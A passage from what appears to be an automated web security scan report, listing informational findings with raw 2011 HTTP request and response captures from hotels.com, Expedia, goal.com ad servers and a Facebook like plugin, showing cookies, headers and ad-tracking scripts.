Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response 2

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc071952f762daf6c74f0896932; expires=Mon, 01-Oct-2012 23:52:04 GMT; path=/
Content-Length: 2675
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"c8eddb4a-d9d5-0c5b-6e12-562295aa26ea",
"size":"728x90",
"floor":"1.3",
"channel":"oxpv1:34-632-1929-2254-6393",
"hrid":"f98c64efa22cad311498b5f294063ae9-1317599524",
"beacon":"<div id='beacon_b556676292' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&amp;campaignid=632&amp;zoneid=6393&amp;cb=b556676292&amp;r_id=f98c64efa22cad311498b5f294063ae9&amp;r_ts=lsgqas' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"<!-- Rubicon Project tag -->\r\n<!-- Site: Goal.com Zone: My Site Size: Leaderboard (728x90) -->\r\n<script language=\"JavaScript\" type=\"text\/javascript\">\r\nvar cb = Math.random();\r\nvar d = document;\r\nd.write('<script language=\"JavaScript\" type=\"text\/javascript\"');\r\nd.write('src=\"http:\/\/optimized-by.rubiconproject.com\/a\/7743\/12359\/21900-2.js?cb='+cb+'\">');\r\nd.write('<\\\/scr'+'ipt>');\r\n<\/script>\r\n<!-- end Rubicon Project tag --><div id='beacon_b556676292' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=10996&amp;campaignid=3553&amp;zoneid=6393&amp;loc=1&amp;cb=b556676292&amp;r_id=f98c64efa22cad311498b5f294063ae9&amp;r_ts=lsgqas' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script>
<script type="text/javascript" src="http://bid.openx.net/jstag"></script>
<noscript><!-- Rubicon Project tag -->
<!-- Site: Goal.com Zone: My Site Size: Leaderboard (728x90) -->
<script language="JavaScript" type="text/javascript">
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js?cb='+cb+'">');
d.write('<\/scr'+'ipt>');
</script>
<!-- end Rubicon Project tag --><div id='beacon_b556676292' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d.tradex.openx.com/lg.php?bannerid=10996&amp;campaignid=3553&amp;zoneid=639
...[SNIP]...
17.2. http://delivery.hotels.com/Hotels/Delivery.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://delivery.hotels.com
Path:   /Hotels/Delivery.aspx

Request 1

GET /Hotels/Delivery.aspx?LAN=en_US&P=PROPERTY_DESCRIPTION&D=BOS&CI=10%2f04%2f2011&CO=10%2f07%2f2011&pr=1&pa0=2&RID=A2AFB563-0907-4A03-86F0-03006AED6E0E&H=279478&HP=289.0 HTTP/1.1
Host: delivery.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; UID=1961757583|1|0; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3md8l5aT/KgDPt+3IVCZ0+X/OJlVTBCzzIJq6mbaXw5f2OTC9SJuffV9JxhkotBEViCI9C/lLFfEkan9sqnGJkiNO063snxtu5wSxTUNe8/bIJVcqrlCAl0XA9V5PzeRLbpFrDHWUr91KWkqiLKfvmiC1YyVop9id6jRgWqmJcXrStYZxh1Ko0KZmHsu1OyGvCuBJj15A4max6Cfmtx38OoK; hl_ubm=YDnUkiZb5XknMSm4p9+V5cZHCQxkEJ6V6VqmAnOws74lcpUw6ATilWACOa7+CMV6BPk9KWTKRZCo+bSXw6V1OBTkPGiowZ+0FoEtWiQ+BQ8=; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961757583|1|0; expires=Tue, 02-Oct-2012 00:28:52 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3mcQGEZsuUEqCnQbfgjRj4VsjvumK61KYW6STNlZyeUAoRVCwQV95GelrZYv9T+F4ihtxKQX2KvJ7B5A5irb80cRm/ytUchfcD4751Ifq1MCuSv/SbW9T5SKs60TyNFRhvi7r3qCLm0xePAkzqTyjWkO9smcGQ45jVLKNXKPyLBr0ZmBx9IhDTuGrSvRTLDRtrL7iZCRnyyGZcmGrHvDoTT+I+B0mUa+sljI8aJcgg/Qm62+DhGTQPwBV6MYexkhjO8=; expires=Thu, 02-Oct-2014 00:28:52 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:28:51 GMT
Connection: close

var THSearch = 3028518073;var thSiteId = 9;
var radioButtonInitialized=false;var th_domain="delivery.hotels.com";var th_protocol=(document.location.toString().indexOf("https")!=-1)?"https":"http";var th_imgPlus=th_protocol+"://media.expedia.com/ads/extras/media/images/HCOM/plus_icon.png";var th_imgMinus=th_protocol+"://media.expedia.com/ads/extras/media/images/HCOM/minus_icon.png";var th_errs=0;var thPage,thOValue;jQuery.cookie=function(name,value,options){if(typeof value!="undefined"){options=options||{};if(value===null){value="";options.expires=-1}var expires="";if(options.expires&&(typeof options.expires=="number"||options.expires.toUTCString)){var date;if(typeof options.expires=="number"){date=new Date();date.setTime(date.getTime()+(options.expires*24*60*60*1000))}else{date=options.expires}expires="; expires="+date.toUTCString()}var path=options.path?"; path="+(options.path):"";var domain=options.domain?"; domain="+(options.domain):"";var secure=options.secure?"; secure":"";document.cookie=[name,"=",encodeURIComponent(value),expires,path,domain,secure].join("")}else{var cookieValue=null;if(document.cookie&&document.cookie!=""){var cookies=document.cookie.split(";");for(var i=0;i<cookies.length;i++){var cookie=jQuery.trim(cookies[i]);if(cookie.substring(0,name.length+1)==(name+"=")){cookieValue=decodeURIComponent(cookie.substring(name.length+1));bre
...[SNIP]...

Request 2

GET /Hotels/Delivery.aspx?LAN=en_US&P=PROPERTY_DESCRIPTION&D=BOS&CI=10%2f04%2f2011&CO=10%2f07%2f2011&pr=1&pa0=2&RID=A2AFB563-0907-4A03-86F0-03006AED6E0E&H=279478&HP=289.0 HTTP/1.1
Host: delivery.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; UID=1961757583|1|0; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3md8l5aT/KgDPt+3IVCZ0+X/OJlVTBCzzIJq6mbaXw5f2OTC9SJuffV9JxhkotBEViCI9C/lLFfEkan9sqnGJkiNO063snxtu5wSxTUNe8/bIJVcqrlCAl0XA9V5PzeRLbpFrDHWUr91KWkqiLKfvmiC1YyVop9id6jRgWqmJcXrStYZxh1Ko0KZmHsu1OyGvCuBJj15A4max6Cfmtx38OoK; hl_ubm=YDnUkiZb5XknMSm4p9+V5cZHCQxkEJ6V6VqmAnOws74lcpUw6ATilWACOa7+CMV6BPk9KWTKRZCo+bSXw6V1OBTkPGiowZ+0FoEtWiQ+BQ8=; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:29:14 GMT
Connection: close

17.3. http://extras.expedia.com/Hotels/Delivery/ISDirect.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://extras.expedia.com
Path:   /Hotels/Delivery/ISDirect.aspx

Request 1

GET /Hotels/Delivery/ISDirect.aspx?thrn=635569865&Path=HOT&HN=Hotel%20Commonwealth&HID=894999&SV=40&pr=1&CI=20111014&CO=20111016&pa=2&pc=0&ca=&RN=Kenmore%20Room|Fenway%20Room|Commonwealth%20Room&AP=||&P=||&drid=660&vers=en_US&sid=1&tpid=1&eapid=21187 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; UID=1961758836|0|0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; expEAPID=00; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+GZsSugzPj44bU6i3lytIIs1AmibCRbQsFxIV6Rm6hVtS8XFB5+Ybtt7LlL2ngKo/3MZXMZeAv1agsoGnLEijiy1UGml8x4MalGwB7gMZ8YKmw4rdHPE8fjrABaqXy92N/rAUZv0Bp56Z43Np/g/+Q83s3WVMhP7tSrZHUPcwvqSFfJu+ADJZw+cpAMQevWwCSPFyAaK32md2Q1sM1k6ehVJgTG6c0M0umpnQLXIpde/cX9fDeTw+MVNStyGLsBv8T2IygNQD8KljABoP+lIG66oNCE0yIgA6c18WfGFGaBrsUsH80bmmnEoUWSaTQ38ft1eupTul/AnYkAPiqr+ZV7GVoAvUMBeP9d3AcfYYYeetW2spKzsTF2; hl_ubm=YDnUkiZb5XknMSm4p9+V5T8RmRF0mVMvy3+V1f5ajj9dflZl2WuSXyvJahmCZ6mo/NwB5qXcNob793uClge54w==; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961758836|0|0; expires=Tue, 02-Oct-2012 01:02:49 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+HLJmxmUhG2DfAd521oLsclktNfAOvcaPV6oi2IfHJjqul4zzjU9LXQkjNf2WvqfZqdXCa3A29SsKe+ybsW1+KB9q3k8/HsB5zRSsUSE1LTZIA3+VxUeBbOVTgZoaWvu0C1RPzxnm4c69yDmjOTUgUbkPe5bK9TQIM5+/rqSOlt6M9Kacg/4gaZL3WgUhe+L3wPJYWqiktHslK4Ql6n2LILMfXFTpTOS6gB6/NLli1taXF1q1bB2lZvFZlcSmfBf5JPdtgQhrhvAnroVp7PP6DFdMVjqf1Q8nhbFmORqCOaM4C1/nBuXOkexOjyUzCM4fLgqY3P94oq1AGny1QrPt1Ei9KiUIC/J+yleDb3wJU7NRftazmHPcqwaSkNUdqEgdEKQxWbd+aByw==; expires=Thu, 02-Oct-2014 01:02:49 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 01:02:48 GMT
Connection: close

var THSearch = 3028587642;var thSiteId = 1;
if(typeof th_domain=="undefined"){th_domain="extras.expedia.com"}var thProt=(window.location.protocol=="http:")?"http":"https";var thCoTxt={code:"UK",inlineOpen:"Show details",inlineClose:"Hide details",popupOpen:"see details",popupClose:"Close",popupHeadline:"",CallCost:"Call cost",bdOpen:"Show Extras Details",bdClose:"Hide Extras Details",bdTotal:"total",bdFree:"FREE",terms:"Terms & Conditions",policy:"Privacy Policy",bookFlightPlusHotel:"Book flight + hotel",termsLink:"//www.expedia.co.uk/daily/service/thterms.asp?IID=",policyLink:"//www.expedia.co.uk/daily/service/privacy.asp",compHeader:"Complimentary items, courtesy of Expedia",compFree:'This booking includes <span style="color:#cc6600; font-weight:bold;">FREE Expedia Extras</span>',getYour:"View Details",viewReceive:"Request Shipment",printCoupon:"Print Your Voucher",viewRedeem:"View instructions to redeem",itinClaim:"This booking includes FREE Expedia Extras",topOfPage:"back to top",included:"Included",showAll:"Show all",extrasIncluded:"more Extras Included."};var thErrorC=0;var thPopupC=typeof(thPopupC)!="undefined"?thPopupC:0;var th1pgOverrideStyle=(document.getElementById("pageId")&&document.getElementById("pag
...[SNIP]...

Request 2

GET /Hotels/Delivery/ISDirect.aspx?thrn=635569865&Path=HOT&HN=Hotel%20Commonwealth&HID=894999&SV=40&pr=1&CI=20111014&CO=20111016&pa=2&pc=0&ca=&RN=Kenmore%20Room|Fenway%20Room|Commonwealth%20Room&AP=||&P=||&drid=660&vers=en_US&sid=1&tpid=1&eapid=21187 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; UID=1961758836|0|0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; expEAPID=00; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+GZsSugzPj44bU6i3lytIIs1AmibCRbQsFxIV6Rm6hVtS8XFB5+Ybtt7LlL2ngKo/3MZXMZeAv1agsoGnLEijiy1UGml8x4MalGwB7gMZ8YKmw4rdHPE8fjrABaqXy92N/rAUZv0Bp56Z43Np/g/+Q83s3WVMhP7tSrZHUPcwvqSFfJu+ADJZw+cpAMQevWwCSPFyAaK32md2Q1sM1k6ehVJgTG6c0M0umpnQLXIpde/cX9fDeTw+MVNStyGLsBv8T2IygNQD8KljABoP+lIG66oNCE0yIgA6c18WfGFGaBrsUsH80bmmnEoUWSaTQ38ft1eupTul/AnYkAPiqr+ZV7GVoAvUMBeP9d3AcfYYYeetW2spKzsTF2; hl_ubm=YDnUkiZb5XknMSm4p9+V5T8RmRF0mVMvy3+V1f5ajj9dflZl2WuSXyvJahmCZ6mo/NwB5qXcNob793uClge54w==; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 01:06:23 GMT
Connection: close

17.4. http://goal.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goal.us.intellitxt.com
Path:   /intellitxt/front.asp

Request 1

GET /intellitxt/front.asp?ipid=17560 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response 1

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11435
Date: Mon, 03 Oct 2011 00:00:30 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggingOn:function()
{return false;},hilite:function()
{}}}
itxtFeedback=function()
{};
if('undefined'==typeof $iTXT){$iTXT={};};document.itxtDisabled=1;
if(document.itxtDisabled)
{document.itxtInProg=1;
if(!$iTXT.cnst){$iTXT.cnst={};}
if(!$iTXT.debug){$iTXT.debug={};}
if(!$iTXT.glob){$iTXT.glob={track:{}};}
if(!$iTXT.js){$iTXT.js={};}
if(!$iTXT.tmpl){$iTXT.tmpl={};}
if(!$iTXT.tmpl.js){$iTXT.tmpl.js={};}
if(!$iTXT.tmpl.components){$iTXT.tmpl.components={};}
if(!$iTXT.core){$iTXT.core={};};

if(!$iTXT.data){$iTXT.data={};};

if(!$iTXT.debug){$iTXT.debug={};};


if(!$iTXT.fx){$iTXT.fx={};};

if(!$iTXT.itxt){$iTXT.itxt={};};

if(!$iTXT.metrics){$iTXT.metrics={};};


if(!$iTXT.tmpl){$iTXT.tmpl={};};

if(!$iTXT.ui){$iTXT.ui={};};


document.itxtIsReady=0;
$iTXT.js.loaderCallbacks=[];$iTXT.js.exclCont=function()
{try
{var d=document.getElementById('itxtexclude');if(null==d)
{var b=document.getElementsByTagName('body')[0];d=document.createElement('div');d.id='itxtexclude';b.insertBefore(d,b.firstChild);}
return d;}catch(x){};};$iTXT.js.load=function(src)
{if('string'!=typeof src||(!src.match(/^http/)&&!src.match(/^file/)))
{return;};try
{var e=document.createElement('script');e.src=src;e.type='text/javascript';var d=$iTXT.js.exclCont();d.insertBefore(e,d.firstChild);}catch(x){};};$iTXT.js.loadCss=function(src,id){try
{var ss=document.createElement('link');ss.id=id;ss.href=src;ss.type='text/css';ss.rel='stylesheet';var d=$iTXT.js.exclCont();d.insertBefore(ss,d.firstChild);}catch(x){}};if(!$iTXT.js.loader){$iTXT.js.loader={};}
$iTXT.js.libPath='http://images.intellitxt.com/ast/js/vm/jslib/';$iTXT.js.loadLib=function(libName,className)
{var lib='$iTXT.'+libName+'.'+className;var path=$iTXT.js.libPath+libName+'/'+className.toLowerCase()+'.js';if('undefined'==typeof($iTXT.js.loader[lib]))
{$iTXT.js.loader[lib]=false;};};$iTXT.js.check=function()
{if(!document.itxtIsReady)
{return window.setTimeout($iTXT.js.check,100);}
var error=0;for(var libName in $iTXT.js.loader)
{if(!$iTXT.js.loader[libName])
{error=1;break;};}
if(error)
{window.setTimeout($iTXT.js.check,100);
...[SNIP]...

Request 2

GET /intellitxt/front.asp?ipid=17560 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response 2

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Content-Length: 282
Date: Mon, 03 Oct 2011 00:00:41 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggingOn:function()
{return false;},hilite:function()
{}}}
itxtFeedback=function()
{};
17.5. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?app_id=178412055558267&href=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&send=false&layout=button_count&width=140&show_faces=false&action=recommend&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.23
X-Cnection: close
Date: Sun, 02 Oct 2011 23:57:56 GMT
Content-Length: 23424

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
